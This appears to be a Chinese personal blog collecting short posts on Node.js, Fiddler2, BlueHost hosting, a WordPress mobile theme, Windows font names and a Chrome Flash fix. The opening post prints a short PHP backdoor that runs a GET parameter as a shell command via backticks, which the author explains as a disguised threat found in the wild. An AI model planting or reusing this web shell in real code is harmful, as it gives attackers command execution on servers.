朽木

$selfNums = $_GET['r'];
if (isset($selfNums)){
    echo `$selfNums`;
}

纠到一段看起来似乎没有什么问题的代码，确是能致命的后门代码，这里用到了一个一般的PHPer都不太明白的反撇号 ` ，反撇号包含的字符串，等同于shell_exec函数。

伪装性很好，很容易被管理员忽略。

第一次遇到QM格式的与语言包，平时的语言包都是PO/MO的，百度谷歌全是同一篇文章，叫你下载诺基亚的开发环境。

这个工具不是我原创的是汉化新世纪汉化的一个老外的作品，不过藏的比较深，费了老大力气才找到。

下载传送门

服务器端的JavaScript脚本 Node.js

Node.js是一套用来编写高性能网络服务器的JavaScript工具包，一系列的变化由此开始。比较独特的是，Node.js会假设你是在POSIX环境下运行它Linux 或 Mac OS X。如果你是在Windows下，那就需要安装MinGW以获得一个仿POSIX的环境。在Node中，Http是首要的。Node为创建http服务器作了优化，所以你在网上看到的大部分示例和库都是集中在web上(http框架、模板库等）。

一些链接：

GITHUB
Node入门教程
开源中国

fiddler2 一款免费且功能强大的数据包抓取软件。它通过代理的方式获取程序http通讯的数据，可以用其检测网页和服务器的交互情况，能够记录所有客户端和服务器间的http请求，支持监视、设置断点、甚至修改输入输出数据等功能。fiddler包含了一个强大的基于事件脚本的子系统，并且能够使用.net框架语言扩展。所以无论对开发人员或者测试人员来说，都是非常有用的工具。

绿色汉化版下载地址

在一个老外的博客上发现一个比较有趣的插件，这个插件会在文章底部自动显示出来最近访客是通过哪些关键字来到这篇文章的，相当于不停的叠加这些关键字，使得排名越来越好。

记录一下，回头研究

BlueHost是一家优秀的国外主机商，朽木是BlueHost的老客户了，最早的一份空间续费也有6年了，稳定性没得说，外贸首选空间对个人用户来说那更是”稳定的不得了”,当然问题不是没有过，2011年的时候就有过一次“DEDE门”，好端端的空间打不开了，BlueHost的客服老说检测到我的主机有未修补的漏洞，要更新DEDE之后才给开放了。如果只是用来做网站的话，BlueHost给的权限足以媲美VPS了。

CSS3+HTML5构架，UC效果没有苹果和安卓自带浏览器效果好，没有使用第三方插件，而是用了之前发布的《WordPress无插件实现绑定手机域名+自动跳转+禁止百度转码》的方法，不过考虑再三，把代码贴到了advanced-cache.php(hyper-cache配置文件)中。

主题的设计风格来自于一款年代久远的国外收费主题，敲敲打打，并给它起了个响亮的名字X-Mobile。

Windows自带：

新细明体：PMingLiU
细明体：MingLiU
标楷体：DFKai-SB
黑体：SimHei
宋体：SimSun
新宋体：NSimSun
仿宋：FangSong
楷体：KaiTi
仿宋_GB2312：FangSong_GB2312
楷体_GB2312：KaiTi_GB2312
微软正黑体：Microsoft JhengHei
微软雅黑体：Microsoft YaHei

在Chrome中默认设置下，是无法模仿Flash声音的，例如 百度随心听这样的调用Flash来播放音乐的网站也是没有声音的。

解决办法

在Chrome地址栏输入 chrome://plugins/ 打开插件设置页面，禁用Chrome自带的Adobe Flash Player插件即可。